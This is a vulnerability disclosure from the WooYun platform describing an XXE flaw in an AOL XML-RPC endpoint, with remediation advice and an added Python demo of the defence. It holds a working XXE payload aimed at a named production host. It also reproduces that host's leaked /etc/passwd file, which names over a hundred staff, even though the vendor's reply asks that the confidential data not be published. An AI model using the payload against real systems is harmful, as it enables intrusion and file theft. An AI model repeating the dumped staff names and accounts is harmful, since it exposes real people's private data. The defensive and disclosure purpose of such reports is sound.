
Vulnerability Summary (followed by 24 users)

Defect ID: wooyun-2015-0148793

Title: AOL Website XML External Entity (XXE) Vulnerability

Vendor: aol.com

Author: 猪猪侠

Submitted: 2015-10-23 01:33

Fixed: 2015-12-11 00:18

Published: 2015-12-11 00:18

Type: Arbitrary file traversal/download

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure timeline:

2015-10-23: Details sent to the vendor; awaiting vendor response
2015-10-27: Vendor confirmed; details visible to the vendor only
2015-11-06: Details disclosed to core white hats and relevant domain experts
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-11: Details disclosed to the public

Summary:

When processing a POST request body containing XML, the endpoint's XML parser resolves external entities declared in the request's DTD, so a request can instruct it to read content from network and local file resources accessible to the host and return that content in the response.

Details:

#1 XML-RPC service

http://dbr-bulk-shared-b-atc.evip.aol.com/xmlrpc

Proof of Vulnerability:

#2 exploit

POST /xmlrpc (request body):

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>


[Screenshot: xmlrpc.jpg; the contents of /etc/passwd returned by the server are reproduced below]


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
postgres:x:26:26:PostgreSQL Server User:/home/postgres:/bin/bash
mysql:x:27:27:Mysql User:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smmsp:x:51:51:smmsp mail user:/var/spool/mqueue:/dev/null
piranha:x:60:60::/etc/sysconfig/ha:/dev/null
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
quantum:x:229:30:Quantum:/home/quantum:/bin/ksh
jsschiff:x:419:20:Jonathan Schiff:/home/jsschiff:/bin/bash
saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
abrt:x:499:499::/etc/abrt:/sbin/nologin
fsemaan:x:568:1026:Fady Semaan:/home/fsemaan:/bin/bash
gffletch:x:740:1026:George Fletcher:/home/gffletch:/bin/bash
shallett:x:781:1026:Stephen Hallett:/home/shallett:/bin/bash
sapiadm:x:789:30:IIOPS SAPI Admin Account:/home/sapiadm:/bin/bash
dlevy:x:801:1051:Douglas Levy:/home/dlevy:/bin/bash
cohenn:x:877:20:Neil Cohen:/home/cohenn:/bin/bash
sybase:x:950:60:Sybase DBA:/home/sybase:/bin/ksh
richard:x:1206:81:Richard Rodriguez-Val:/home/richard:/bin/bash
netadm:x:1562:81:Network Operations:/home/netadm:/bin/bash
awick:x:1612:20:Andy Wick:/home/awick:/bin/bash
danshong:x:1673:1026:Dan Hong:/home/danshong:/bin/bash
bangklee:x:2125:1026:Bang Lee:/home/bangklee:/bin/bash
prjones:x:2308:1026:Peter Jones:/home/prjones:/bin/bash
lshoang:x:2386:1026:Lynn Hoang:/home/lshoang:/bin/bash
saunders:x:2597:1026:James Saunders:/home/saunders:/bin/bash
karen:x:2683:1026:Karen Johnson:/home/karen:/bin/bash
jingwu:x:3017:1026:Jing Wu:/home/jingwu:/bin/bash
kpulak:x:3246:1026:Ken Pulak:/home/kpulak:/bin/bash
nims:x:3374:1002:Chris Nims:/home/nims:/bin/bash
dhaydon:x:3879:1026:Doug Haydon:/home/d/dhaydon:/bin/bash
newaol:x:4052:1218:Web Server Account:/home/newaol:/bin/bash
zhaoxi:x:4323:1026:Zhaoxi Bu:/home/zhaoxi:/bin/bash
kpettit:x:4572:1026:Kevin Pettit:/home/kpettit:/bin/bash
qrq:x:4613:1026:IIOPS QA Test User:/home/qrq:/bin/bash
mandrews:x:4752:1026:Michael Andrews:/home/mandrews:/bin/bash
uwelovas:x:4793:1026:Uwe Lovas:/home/uwelovas:/bin/bash
gleework:x:5040:1026:Glen Lee:/home/g/gleework:/bin/tcsh
mcarpet:x:5141:1195:Magic Carpet:/home/mcarpet:/bin/bash
slinhart:x:5174:125:Steven Linhart:/home/slinhart:/bin/bash
vvsaxena:x:5175:1026:Vishal Saxena:/home/vvsaxena:/bin/bash
moeller:x:5202:1026:Kurt Moeller:/home/moeller:/bin/bash
mmiranda:x:5217:1026:Maxie Miranda:/home/mmiranda:/bin/bash
dvoss:x:5408:1026:Daniel Voss:/home/dvoss:/bin/bash
lachlan:x:5435:1035:Lachlan Maxwell:/home/lachlan:/bin/bash
dps:x:5436:1026:Donald Sengpiehl:/home/d/dps:/bin/ksh
zgrodek:x:5479:1026:Renee Sribar:/home/zgrodek:/bin/bash
pmorgan:x:5490:1026:Paul Morgan:/home/pmorgan:/bin/bash
rjmyers:x:5582:1013:Roy Myers:/home/rjmyers:/bin/bash
qrqt:x:5895:1026:IIOPS qrqt test system owner:/home/qrqt:/bin/bash
cmontano:x:6313:1026:Carlos Montano:/home/cmontano:/bin/bash
mfbma:x:6529:1026:Brian Ayala:/home/mfbma:/bin/bash
cpfort:x:6660:1002:Chris Fort:/home/cpfort:/bin/bash
gsayadia:x:6705:1222:Greg Sayadian:/home/gsayadia:/bin/bash
zhanglu:x:6817:60:Zhang Lu:/home/zhanglu:/bin/bash
sliang:x:7317:1026:Steven Liang:/home/sliang:/bin/bash
bsun21:x:7946:951:Bruce Sun:/home/bsun21:/bin/bash
jbothe:x:8213:1026:Jocelyn Bothe:/home/jbothe:/bin/bash
kblackic:x:8339:1026:Ken Black:/home/kblackic:/bin/bash
schnee:x:8627:1026:Joel Schnee:/home/schnee:/bin/bash
mcgerakr:x:8641:1002:Keith McGerald:/home/mcgerakr:/bin/bash
bbbrown:x:8664:1026:Robert Brown:/home/bbbrown:/bin/bash
djian:x:8732:1026:Dan Jian:/home/djian:/bin/bash
willjw:x:8815:1026:William Won:/home/willjw:/bin/bash
devel:x:8981:1296:IIOPS dev test system owner:/home/devel:/bin/bash
richr:x:9051:1002:Rich Rubenstein:/home/richr:/bin/bash
mdunbar:x:9148:1026:Matthew Dunbar:/home/mdunbar:/bin/bash
pemkes:x:9438:1026:Paul Emkes:/home/pemkes:/bin/bash
akoshy:x:9641:951:Ashy Koshy:/home/a/akoshy:/bin/bash
dev:x:11062:11062:CS dev:/home/dev:/bin/bash
chuongmp:x:12459:1026:Chuong Pham:/home/chuongmp:/bin/bash
jobi:x:13695:1026:JOBI:/home/jobi:/bin/bash
nagios:x:13783:1617:Billing nagios:/home/nagios:/bin/ksh
rmadini:x:14189:1026:Radhika Madini:/home/rmadini:/bin/bash
mcarpet3:x:14436:1638:AOL - Web Authentication System:/home/mcarpet3:/bin/bash
rrost:x:16383:1026:Robert Rost:/home/rrost:/bin/bash
dixonjm:x:16464:1026:Jen Dixon:/home/dixonjm:/bin/bash
billwake:x:16958:1026:William Wakefield:/home/billwake:/bin/bash
sophiaa:x:17484:1026:Sophia Arokiaraj:/home/s/sophiaa:/bin/bash
taraschk:x:17630:1026:Matthew Taraschke:/home/taraschk:/bin/bash
rajeev:x:18163:130:Rajeev Manghnani:/home/rajeev:/bin/ksh
openauth:x:18193:1638:SNS's Open Auth:/home/openauth:/bin/bash
mohamed1:x:18676:1026:Mohamed Osman:/home/mohamed1:/bin/bash
dpadmin:x:18734:11337:IIOPS Dynapub Application User:/home/dpadmin:/bin/bash
tb321:x:19109:1026:Terrance Burke:/home/tb321:/bin/bash
amitv:x:19573:1026:Amit Varde:/home/amitv:/bin/bash
modsec:x:19696:11366:IIOPS modsec:/home/modsec:/bin/bash
fenerty:x:19955:1026:Vinny Fenerty:/home/fenerty:/bin/bash
gopinath:x:20352:1026:Gopinath Kalidass:/home/gopinath:/bin/bash
moiztcs:x:20726:130:Moiz Arafat:/home/moiztcs:/bin/bash
venug:x:21433:1026:Venu Vejandla:/home/venug:/bin/bash
gaurav:x:21438:130:Gaurav Agrawal:/home/gaurav:/bin/bash
kkumar:x:21499:1026:Krishnakumar Subramanian:/home/kkumar:/bin/bash
rpokhare:x:21654:1026:Ranjan Pokharel:/home/rpokhare:/bin/bash
mongodb:x:21780:11593:Default mongodb for COI:/home/mongodb:/bin/bash
csoohoo:x:21995:1026:Chris Soo Hoo:/home/csoohoo:/bin/bash
jmurillo:x:22092:1026:Jady Murillo:/home/jmurillo:/bin/bash
ptivnan:x:22109:1026:Patrick Tivnan:/home/ptivnan:/bin/bash
jmcqueen:x:22166:1026:Jeff McQueen:/home/jmcqueen:/bin/bash
kristinb:x:22172:1026:Kristin Boran:/home/kristinb:/bin/bash
abudri11:x:22306:1026:Abdullah Budri:/home/abudri11:/bin/bash
scharles:x:22527:1026:Charles Sinclair:/home/scharles:/bin/bash
ctoby:x:22546:1026:Cindy Toby:/home/ctoby:/bin/bash
jcobb29:x:22623:1026:Justin Cobb:/home/jcobb29:/bin/bash
skunchak:x:22642:1026:Sivaprasad Kunchakuri:/home/skunchak:/bin/bash
bhashimi:x:22647:1026:Belal Hashimi:/home/bhashimi:/bin/bash
aashish:x:22677:130:Amit Ashish:/home/aashish:/bin/ksh
paulv:x:22734:1026:Paul Vuchetich:/home/paulv:/bin/bash
bbarek:x:22769:1026:Bahier Barekzoy:/home/bbarek:/bin/bash
vbsetty:x:22856:1026:Venkata Bavirisetty:/home/vbsetty:/bin/bash
phanin:x:23037:1026:Phanindra Golkonda:/home/phanin:/bin/bash
ewolk:x:23132:1026:Ethan Wolkowicz:/home/ewolk:/bin/bash
teddoro:x:23222:1026:Ted Dorosheff:/home/teddoro:/bin/bash
mhartman:x:23340:1026:Matt Hartman:/home/mhartman:/bin/bash
zkelly44:x:23432:1026:ZacK Kelly:/home/zkelly44:/bin/bash
jdesmet:x:23549:1026:Jordan Desmet:/home/jdesmet:/bin/bash
radn14:x:23565:1026:Radoslaw Niedzialkowski:/home/radn14:/bin/bash
par13:x:23572:1026:Paul Rehbock:/home/par13:/bin/bash
hchauhan:x:23616:1026:Himanshu Chauhan:/home/hchauhan:/bin/bash
averkhov:x:23639:1026:Alex Verkhovtsev:/home/averkhov:/bin/bash
bolson:x:23669:1026:Brian Olson:/home/bolson:/bin/bash
shivahuv:x:23810:1026:Shivanand Huvinahalli:/home/shivahuv:/bin/bash
dkalyan:x:23822:1026:Deepak Kalyan:/home/dkalyan:/bin/bash
vrpoth2:x:23858:1026:Vivek Reddy Pothukolu:/home/vrpoth2:/bin/bash
pajones:x:23892:1026:Paul Jones:/home/pajones:/bin/bash
gquiroz:x:23909:1026:Geraldine Quiroz:/home/gquiroz:/bin/bash
shosey:x:23910:1026:Sean Hosey:/home/shosey:/bin/bash
ianmc:x:23911:1026:Ian Mcdonald:/home/ianmc:/bin/bash
slenka83:x:23952:1026:Soumya Lenka:/home/slenka83:/bin/bash
oqasmi:x:23960:1026:Omar Qasmi:/home/oqasmi:/bin/bash
jcaplan:x:23990:1026:Jeffrey Caplan:/home/jcaplan:/bin/bash
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

Remediation:

Disable DTD processing, or at minimum external entity resolution, in the XML parser behind the /xmlrpc endpoint; XML-RPC requests never require a DOCTYPE, so any request carrying one can be rejected outright. References:

http://www.vsecurity.com/download/publications/XMLDTDEntityAttacks.pdf
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
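The following is an added example, not code from the report or from AOL. It reproduces the report's payload shape offline against a constructed temporary file (standing in for /etc/passwd), shows the leak when the parser resolves external general entities, and then shows the two defences named above: the same parse with external entity resolution switched off, and a pre-parse gate that rejects any body carrying a DOCTYPE or ENTITY declaration. The Python standard-library SAX parser is used because its feature_external_ges flag exposes exactly the behaviour in question; the file contents and the gate function are assumptions made for the demo.

```python
"""Added example (not from the WooYun report): replay the XXE payload
against a constructed file, then apply the hardened configuration."""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax import handler

# Constructed stand-in for the /etc/passwd line the report leaked.
SECRET_LINE = "svc:x:1000:1000:constructed account:/home/svc:/bin/bash"

# Same structure as the report's payload; only the SYSTEM URL is swapped
# so the demo reads a temp file instead of the real /etc/passwd.
PAYLOAD_TEMPLATE = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ELEMENT methodName ANY >'
    '<!ENTITY xxe SYSTEM "{url}" >]>'
    '<methodCall><methodName>&xxe;</methodName></methodCall>'
)


def build_payload(file_url: str) -> bytes:
    return PAYLOAD_TEMPLATE.format(url=file_url).encode("ascii")


class MethodNameCollector(handler.ContentHandler):
    """Collects the text of <methodName>; in the report's payload that is
    where the expanded entity (the file contents) ends up."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "methodName":
            self._inside = True

    def endElement(self, name):
        if name == "methodName":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.parts.append(content)


def parse_method_name(body: bytes, resolve_external: bool) -> str:
    """Parse an XML-RPC body and return the methodName text.

    resolve_external=True mirrors the vulnerable server: external general
    entities are fetched and inlined. False is the hardened setting."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = MethodNameCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(body))
    return "".join(collector.parts)


def has_dtd(body: bytes) -> bool:
    """Pre-parse gate (assumed defence): XML-RPC never needs a DTD, so any
    DOCTYPE or ENTITY declaration marks the request for rejection. The
    keywords are case-sensitive in XML, so a byte search is sufficient."""
    return b"<!DOCTYPE" in body or b"<!ENTITY" in body


def run_demo():
    """Returns (leaked_text, hardened_text, gate_rejects)."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "passwd")
        with open(target, "w", encoding="ascii") as fh:
            fh.write(SECRET_LINE)
        body = build_payload(pathlib.Path(target).as_uri())
        leaked = parse_method_name(body, resolve_external=True)
        hardened = parse_method_name(body, resolve_external=False)
        rejected = has_dtd(body)
    return leaked, hardened, rejected


if __name__ == "__main__":
    leaked, hardened, rejected = run_demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
    print("DOCTYPE gate rejects body: ", rejected)
```

Note that Python's SAX parser has defaulted to feature_external_ges=False since 3.7.1; the example sets the flag explicitly on both paths so the contrast does not depend on the interpreter version. In a real deployment the gate belongs in front of the parser (or in the WAF), since it costs one byte search and removes the entire DTD attack surface, including billion-laughs expansion, not just file reads.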

Copyright notice: when reposting, please credit the source, 猪猪侠@乌云 (WooYun).


Vulnerability Response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-10-27 00:16

Vendor reply:

Latest status:

2015-12-10: Please do not publicly release this vulnerability, as it contains confidential data.